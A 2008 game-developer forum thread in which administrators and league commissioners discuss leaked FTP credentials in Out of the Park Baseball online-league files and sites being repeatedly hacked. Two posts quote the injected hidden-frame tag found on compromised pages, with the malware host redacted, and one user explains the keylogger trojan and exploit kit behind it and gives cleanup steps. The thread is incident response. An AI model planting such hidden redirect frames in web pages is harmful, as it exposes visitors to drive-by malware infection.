Home | Webstore
Latest News: OOTP 18.5 Update Available - OOTP 18 Available - FHM 3 Available - MLB Manager 2017 Available Now - Beyond the Sideline Football Announced - Title Bout Championship Boxing 2.5 released

Out of the Park Baseball 18 - Available Now!


Go Back   OOTP Developments Forums > Prior Versions of Our Games > Earlier versions of Out of the Park Baseball > Earlier versions of OOTP: Online Leagues > Earlier versions of OOTP: Commissioner's Corner

Earlier versions of OOTP: Commissioner's Corner Want to run an online league? Want to learn about the 'ins' and 'outs' of being a commish? This is the place!

Reply
 
Thread Tools
Old 12-04-2008, 07:11 AM   #1
Andreas Raht
Administrator
 
Andreas Raht's Avatar
 
Join Date: Jun 2002
Location: Hollern/Stade/Germany
Posts: 8,642
Thanks: 755
Thanked 4,471x in 1,456 posts
Exclamation OOTP Online League Security Problem

Attention, online league commissioners! A security issue has been discovered in the online league dat files. The dat files contain the league server's FTP access information and if a hacker finds the username and password he could easily access your web space and do all kind of malicious things.

We will release a patched version very soon where the FTP information contained in the dat files is encrypted. It's currently in beta testing.
However, you know that each encryption can be hacked, so we strongly suggest that you hide your league files! Only GMs should have access to the league files. There should be no (public) link to the league file anywhere on your web space. That's easy to do and it will keep away the evildoers.

The perfect solution for the league file problem would be an extra subdomain on your web space where PHP/CGI/Perl/ASP is turned OFF and which has an extra FTP account that can only access that sub domain folder.

Please, all commissioners, do the following ASAP:

--- Change the FTP password of the web site which the GMs used for the online leagues NOW (i.e. the password which has been entered in OOTP). The
password must be replaced with another one IMMEDIATELY! If you cannot do that or if you don't know how to do that, you have to ask the admin of the web server, i.e. your ISP (Internet Service Provider) who hosts your web space.

--- Move the league file to a different place on your web server where NOBODY CAN FIND IT. Only the GMs may know the address of the league file! Nobody else should be able to find it. You could just rename the league file or move it to another folder. In OOTP 2007/8/9 there is an option to set the name of the league file. Just set it to for example myLeague_ahsfkas89df.tar.gz and nobody will find it except your GMs who will get the link to the file from you.

--- Remove the link to the league file from your homepage! Many online leagues publish the link on their web page for convenience, but you should no longer do that!

--- Message board software and CMS (Content Management System like Joomla) software used for the online league web sites should be updated whenever updates are available. Hackers find new security holes in that kind of software frequently, simply because they have the source code of the software.

We apologise for any inconvenience!!

Please also have a look at these threads:

http://www.ootpdevelopments.com/boar...e-leagues.html

http://www.ootpdevelopments.com/boar...ty-notice.html
Andreas Raht is offline   Reply With Quote
Old 12-04-2008, 09:05 PM   #2
Officespace99
Minors (Double A)
 
Join Date: Nov 2002
Location: Northern Virginia
Posts: 164
Thanks: 0
Thanked 0x in 0 posts
Can we get a confirmation as to whether this affects OOTP 8, since a large % of leagues are still on this version?
__________________
Current Leagues:
(All years in "game" years)
NOBL - Boston Red Sox (2002-present)
NOBL - Commish (2006 - present)
TTWB - Farmingdale Frunkus (2011 - present)

My OOTP graveyard:
LLM - Yucatan Leones (2012 - folded)
CPL - Detroit Tigers (2011 - folded)
FHBL -Cincinnati Reds (2006 - folded)
Maverick Baseball - Boston Red Sox (2005 - folded)
BPLA - Portland (2004: folded)
Officespace99 is offline   Reply With Quote
Old 12-04-2008, 09:30 PM   #3
Bristolduke
All Star Starter
 
Join Date: May 2006
Posts: 1,171
Thanks: 120
Thanked 341x in 216 posts
The answer is yes. It is in the referenced thread. They are working on patches for 2007 and 8.
__________________
Commish of the Home Nations Baseball Association
Commish of the Baseball Association League
Commish of the League of WAR
Dog Days Baseball - Denton Yorkies
SIMBL2 - Westbury Cannons
Field of Dreams - Potomac Double Os
HSBL - New York Yankees
OMLB - Los Angeles Dodgers
PBF - Tafuna Clippers
Liberty League - Colorado Kings
Bristolduke is offline   Reply With Quote
Old 12-05-2008, 12:57 AM   #4
f.montoya
Hall Of Famer
 
f.montoya's Avatar
 
Join Date: Nov 2004
Posts: 6,042
Thanks: 298
Thanked 285x in 137 posts
I just found this in the index.html from an OOTP 6 online league I host...

Code:
<html>



<head>

<title>OOTP 6 Generated Website</title>

</head>



<frameset rows="100,*" frameborder="0" framespacing="0" border="0">

  <frame name="Banner" scrolling="no" noresize target="Inhalt" src="top.html">

  <frameset cols="100,*">

    <frame name="menu" target="Hauptframe" src="menu.html">

    <frame name="content" src="league.html">

  </frameset>

  <noframes>

  <body><(SPACE HERE) ****** src="http://badsitehere" style="width: 0px; height: 0px; display: none"><(SPACE HERE)  /******>





  <p>Diese Seite verwendet Frames. Frames werden von Ihrem Browser aber nicht 

  unterst・zt.</p>



  </body>

  </noframes>

</frameset>



</html>
OOTP 6 & 6.5 must have the same hole. Don't have time to check right now but we need an emergency patch for 6 and 6.5 too Andreas.
__________________
Fidel Montoya

Asahi2 Baseball ex-Commissioner(Historical League Since 2004)
www.allsimbaseball.com (OOTP web hosting - Customized sites for online leagues - Sign up, Connect OOTP and Play!)
Share Your Mods - Free, unlimited and easy to upload to share your Mods instantly(free site registration required)

Last edited by f.montoya; 12-17-2008 at 07:17 AM.
f.montoya is offline   Reply With Quote
Old 12-05-2008, 03:47 AM   #5
Andreas Raht
Administrator
 
Andreas Raht's Avatar
 
Join Date: Jun 2002
Location: Hollern/Stade/Germany
Posts: 8,642
Thanks: 755
Thanked 4,471x in 1,456 posts
Quote:
Originally Posted by Bristolduke View Post
The answer is yes. It is in the referenced thread. They are working on patches for 2007 and 8.
Sorry, that must be a misunderstanding!

Quote:
Originally Posted by f.montoya View Post
OOTP 6 & 6.5 must have the same hole. Don't have time to check right now but we need an emergency patch for 6 and 6.5 too Andreas.
Unfortunately we cannot patch 6.5 and OOTP 2007 for several reasons. We'll not release patches for the older versions and to be honest: it would not make much sense because if we encrypted the FTP password in the dat file it could still be hacked!
In OOTP 6.5 everything was encrypted, and obviously it has been hacked, too. We could improve the encryption, but it will also be hacked sooner or later.
See, obviously somebody wrote some code to hack OOTP Online leagues. He has to find and download the league file, extract the FTP info, log in to the site and do his dirty job. Lots of work actually, and there are not as many online leagues of the web as for example vBulletin message boards or Joomla web sites, so I don't know why the evildoer does that. There is only one explanation: we have an enemy out there. He cracked the first encryption and he will also crack the next one. No, encryption is not the solution.
We have to change the whole process, and until we did that, the commisioners can do it on their own:

- hide the league files! Only your GMs may know where it is!
- use an extra FTP account for the folder to which the league files are uploaded!
- change your FTP password NOW!

We are sorry that this happened. We will improve OOTP and we will change the online league upload/download process. But the GMs can simply change the process now by hiding the league file and that will do much more than improving the encryption.
Andreas Raht is offline   Reply With Quote
Old 12-05-2008, 04:04 AM   #6
Markus Heinsohn
Developer OOTP
 
Markus Heinsohn's Avatar
 
Join Date: Dec 2001
Location: Germany
Posts: 19,879
Thanks: 3,387
Thanked 28,682x in 4,428 posts
Andreas is right. Please follow his guidelines!
Markus Heinsohn is offline   Reply With Quote
Old 12-05-2008, 04:59 AM   #7
kq76
Global Moderator
 
kq76's Avatar
 
Join Date: Nov 2002
Location: Vancouver, Canada
Posts: 8,696
Thanks: 1,056
Thanked 853x in 477 posts
After the commish changes the league's ftp info everyone in the league will have to be sent a link to download and install the league files manually instead of being able to update through the game because their copy of the game won't be able to ftp yet, right?
__________________
Support the SP-only DH cause (at least for the AL).
See my decision file that now weights 30 factors. Yes, it's gone to extra-innings!

kq76 is offline   Reply With Quote
Old 12-05-2008, 05:19 AM   #8
Tony M
Global Moderator
 
Tony M's Avatar
 
Join Date: Feb 2006
Location: Here
Posts: 6,150
Blog Entries: 3
Thanks: 41
Thanked 326x in 188 posts
Quote:
Originally Posted by kq76 View Post
After the commish changes the league's ftp info everyone in the league will have to be sent a link to download and install the league files manually instead of being able to update through the game because their copy of the game won't be able to ftp yet, right?
Correct, because the FTP details they have in their game will be wrong.
Tony M is offline   Reply With Quote
Old 12-05-2008, 09:20 AM   #9
SMFXR01
All Star Starter
 
SMFXR01's Avatar
 
Join Date: Jan 2007
Posts: 1,178
Thanks: 137
Thanked 80x in 70 posts
Am I right in assuming that version 9.2.7 should not be used and
we should wait for 9.2.9?

I am getting an error when I switch from an Online League to a Solo League.

( UTILITY_FUNCTIONS::get_decrypted_string-invalid source string )

I assume this has to do with identifing the difference between an Online League and a
Non Online League.

Last edited by SMFXR01; 12-05-2008 at 09:54 AM.
SMFXR01 is offline   Reply With Quote
Old 12-06-2008, 02:20 PM   #10
Treches
Hall Of Famer
 
Treches's Avatar
 
Join Date: Dec 2001
Location: Damned Hell
Posts: 2,147
Thanks: 0
Thanked 3x in 3 posts
Quote:
Originally Posted by f.montoya View Post
I just found this in the index.html from an OOTP 6 online league I host...
xxx
OOTP 6 & 6.5 must have the same hole. Don't have time to check right now but we need an emergency patch for 6 and 6.5 too Andreas.
First, remove the address of the ****** from your post. It's a malware site.
Second, while the ftp pw can certainly be obtained from the league file without much hassle, I doubt we are dealing with a cracker doing things manually here. Obviously, the ****** hack is appearing because the ftp pw is leaked, but is a program the one that is inserting them (into all those files named "index" or "main") via a trojan on the user side. And no matter what you do if the trojan isn't removed from the machine, because that sofware (MPack, most likely) cycles and runs non-stop. The trojan is sending the cracker the ftp pw; if you change it but don't erase the trojan, he gets the new pw and you get the ****** code again. He may have targeted OOTP leagues, but websites have been infected by the ****** in the thousands since 2007, from CBS to aunti Mildred's cooking forums.

Usually, it goes like this: this bot signs up on the forums (maybe several times); uses a valid email account and writes down a website address in its profile. Joe Curious notices the new guy on board and clicks to check that website. This one, of course, is a malware site, and the moment Joe Curious gets there his firewall and web brownser are checked for security loopholes, and if he has them, the trojan is d/l'ed and installed automatically. The trojan is a keylogger that sends the cracker all sorts of pw, mainly ftp's. Thus, the moment you change the pw, he gets it. The ****** gets inserted in the code and redirects your page to the malware site, thus infecting those who have security loopholes (mostly everyone whose firewall does no block the redirection).

Things to do here are:
1. Scan your machine for malware. Have in mind that the trojan may block the anti-malware, so you might want to online scan (trend micro, for example) and/or install the anti-malware (a-squared, malware bytes, etc.) on a pen drive and scan the pc from there and remove the trojan.

2. Once you have your machine cleaned, take a close look at all the files you have on your site, erasing those you don't recognize.

3. Change your main ftp pw.

4. Create a ftp user and pw with permission to access just the folder where OOTP exports are located. That's the one you have to type down within the game, not the main ftp id and pw.

5. Rename your "index" pages (at least, your frontpage) to a different name (yourleague.html, for example).

6. Authorize every new registration on your forums.

7. Get yourself a malware shield.

8. Make sure that your web brownser is not allowed to d/l anything automatically.

9. Pray that the trojan is not located on the server side, because then your best move is transferring your site to another one.
__________________
The Computer Baseball League

Last edited by Treches; 12-06-2008 at 02:27 PM.
Treches is offline   Reply With Quote
Old 12-06-2008, 03:14 PM   #11
gollum65
All Star Reserve
 
Join Date: Feb 2007
Posts: 923
Thanks: 18
Thanked 13x in 10 posts
You may be right about it being a trojan, but if that's the case we all have the same trojan. I know of at least 6 sites that were hacked multiple times in the last month or so, using the same method, including my own site which was hacked 4 times. Regardless of how the guy is getting the info, he's getting it and is apparently going after multiple OOTP sites.
gollum65 is offline   Reply With Quote
Old 12-06-2008, 04:05 PM   #12
Treches
Hall Of Famer
 
Treches's Avatar
 
Join Date: Dec 2001
Location: Damned Hell
Posts: 2,147
Thanks: 0
Thanked 3x in 3 posts
It's the same type of trojan and he/they is/are going after all kind of sites because he/they is/are getting paid by the hit. The ****** not only gets inserted in the code but also erases other cracker's iframes. Mpack goes by $800, so we are not dealing with kids fooling around here.
__________________
The Computer Baseball League
Treches is offline   Reply With Quote
Old 12-20-2008, 08:59 PM   #13
Chappy
Hall Of Famer
 
Chappy's Avatar
 
Join Date: Dec 2001
Location: Raleigh, NC
Posts: 2,677
Thanks: 13
Thanked 11x in 10 posts
Hey guys...


The NPBL patched, changed passwords, removed links to files and moved file location back when this thread came out.

And today we were hacked. The Jamaica League was also hacked.

This was inserted in both our forums index.php file and our wordpress index.php file:
Code:
<****** src="evil site" style="width: 0px; height: 0px; display: none"></******>
Do I need to change everything again, and will it even matter if I DO since I've already done all that since the patch???
__________________
NPBL - Commissioner - Pennsylvania Freedom

Last edited by Chappy; 12-21-2008 at 01:44 PM.
Chappy is offline   Reply With Quote
Old 12-21-2008, 12:30 AM   #14
kq76
Global Moderator
 
kq76's Avatar
 
Join Date: Nov 2002
Location: Vancouver, Canada
Posts: 8,696
Thanks: 1,056
Thanked 853x in 477 posts
Quote:
Originally Posted by Chappy View Post
Hey guys...


The NPBL patched, changed passwords, removed links to files and moved file location back when this thread came out.

And today we were hacked. The Jamaica League was also hacked.

This was inserted in both our forums index.php file and our wordpress index.php file: <snip> Do I need to change everything again, and will it even matter if I DO since I've already done all that since the patch???
Is your forum and blog software up-to-date?

Whatever it is, once correct it, you'll probably want to change the passwords and locations again.
__________________
Support the SP-only DH cause (at least for the AL).
See my decision file that now weights 30 factors. Yes, it's gone to extra-innings!

kq76 is offline   Reply With Quote
Old 12-21-2008, 07:26 AM   #15
Treches
Hall Of Famer
 
Treches's Avatar
 
Join Date: Dec 2001
Location: Damned Hell
Posts: 2,147
Thanks: 0
Thanked 3x in 3 posts
Quote:
Originally Posted by Chappy View Post
Hey guys...


The NPBL patched, changed passwords, removed links to files and moved file location back when this thread came out.

And today we were hacked. The Jamaica League was also hacked.

Do I need to change everything again, and will it even matter if I DO since I've already done all that since the patch???
Read:

Quote:
Originally Posted by Treches View Post
Molarmite,

I posted step-by-step instructions on Andreas' thread to fix the issue.

Read what Alan T has written down because that's exactly what's happening to you. You (or whoever has access to your site) have a keylogger trojan on your machine that's sending the ftp pw to the hacker. Until the trojan is removed it's pointless to change the pw, 'cause the moment you change it he gets it. Then a piece of software called Mpack inserts the ****** that redirects your "index" or "main" pages to a malware site. Mpack cycles and runs non-stop as long as it has the pw. Thus, you can clean up the code today but will get the ****** again next week.
__________________
The Computer Baseball League
Treches is offline   Reply With Quote
Old 12-21-2008, 07:29 AM   #16
Treches
Hall Of Famer
 
Treches's Avatar
 
Join Date: Dec 2001
Location: Damned Hell
Posts: 2,147
Thanks: 0
Thanked 3x in 3 posts
And read:

Quote:
Originally Posted by Treches View Post
"That said, I continue to see that the hacker is also placing iframes directly into the league reports as well. So I'm afraid that even a restricted FTP account for the game will not stop this cycle."
--
Correct. Restricted FTP accounts (say the one you place on the downloadable league file) is just to avoid the casual cracker from fooling around, but restrictions don't block Mpack, as it will gain access to the root nevertheless, bypassing the permissions. The only way to block it is erasing the trojan on the user side and then, and only then, changing the pw.
Thus, the patch does nothing if you have the trojan on board.
__________________
The Computer Baseball League
Treches is offline   Reply With Quote
Old 12-21-2008, 07:36 AM   #17
Chappy
Hall Of Famer
 
Chappy's Avatar
 
Join Date: Dec 2001
Location: Raleigh, NC
Posts: 2,677
Thanks: 13
Thanked 11x in 10 posts
So...

Would changing all the info and running a couple of sims from an alternate PC be agood idea?
__________________
NPBL - Commissioner - Pennsylvania Freedom
Chappy is offline   Reply With Quote
Old 12-21-2008, 07:40 AM   #18
Treches
Hall Of Famer
 
Treches's Avatar
 
Join Date: Dec 2001
Location: Damned Hell
Posts: 2,147
Thanks: 0
Thanked 3x in 3 posts
If you use an alternate PC you're safe if a) It's clean, and b) Has a fresh ftp password. In any case, I'd recommend you to focus on removing the keylogger trojan from whomever has it.
__________________
The Computer Baseball League
Treches is offline   Reply With Quote
Old 12-21-2008, 07:42 AM   #19
Treches
Hall Of Famer
 
Treches's Avatar
 
Join Date: Dec 2001
Location: Damned Hell
Posts: 2,147
Thanks: 0
Thanked 3x in 3 posts
Also, remove the ****** link from your post.
__________________
The Computer Baseball League
Treches is offline   Reply With Quote
Old 12-23-2008, 09:09 AM   #20
Chappy
Hall Of Famer
 
Chappy's Avatar
 
Join Date: Dec 2001
Location: Raleigh, NC
Posts: 2,677
Thanks: 13
Thanked 11x in 10 posts
Treches,

Thanks for the replies. I appreciate the help...

However, I'm convinced that their is not a keylogger trojan on my machine. I've swept it now with 3 different products (including the Trend Micro one you recommended) and found nothing.
__________________
NPBL - Commissioner - Pennsylvania Freedom
Chappy is offline   Reply With Quote
Reply

Bookmarks

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT -4. The time now is 09:08 AM.

 

Major League Baseball trademarks and copyrights are used with permission of MLB Advanced Media, L.P. Minor League Baseball trademarks and copyrights are used with the permission of Minor League Baseball. All rights reserved.

The Major League Baseball Players Association (www.MLBPLAYERS.com ) is the collective bargaining representative for all professional baseball players of the thirty Major League Baseball teams and serves as the exclusive group licensing agent for commercial and licensing activities involving active Major League baseball players. On behalf of its members, it operates the Players Choice licensing program and the Players Choice Awards, which benefit the needy through the Major League Baseball Players Trust, a charitable foundation established and run entirely by Major League baseball players. Follow: @MLB_Players; @MLBPAClubhouse; @MLBPlayersTrust

Out of the Park Baseball is a registered trademark of Out of the Park Developments GmbH & Co. KG

Google Play is a trademark of Google Inc.

Apple, iPhone, iPod touch and iPad are trademarks of Apple Inc., registered in the U.S. and other countries.

COPYRIGHT © 2017 OUT OF THE PARK DEVELOPMENTS. ALL RIGHTS RESERVED.

 

Powered by vBulletin® Version 3.8.10
Copyright ©2000 - 2017, vBulletin Solutions, Inc.
Copyright © 2015 Out of the Park Developments